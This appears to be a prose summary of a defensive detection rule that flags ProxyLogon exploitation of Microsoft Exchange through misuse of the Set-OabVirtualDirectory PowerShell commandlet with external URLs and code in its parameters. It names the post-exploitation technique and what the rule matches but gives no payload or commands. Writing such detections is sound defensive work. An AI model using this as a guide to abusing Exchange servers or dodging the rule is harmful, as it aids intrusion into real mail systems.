This detection rule identifies potential exploitation attempts of Microsoft Exchange servers through the ProxyLogon vulnerability, specifically targeting the OabVirtualDirectory component. After successful exploitation, adversaries may invoke the Set-OabVirtualDirectory PowerShell commandlet to manipulate the offline address book (OAB) settings in a malicious way. The rule looks for specific commandlets and parameters typically associated with these exploit attempts, including the acquisition of external URLs and potentially malicious code snippets that are indicative of a nefarious payload being executed. If these patterns are detected, it raises a critical alert, indicating a potential compromise. The detection logic combines keyword searches from both the commandlet and associated parameters to enhance its reliability and minimize false positives, though the rule is designed to trigger only under precise conditions to ensure accurateness of detection.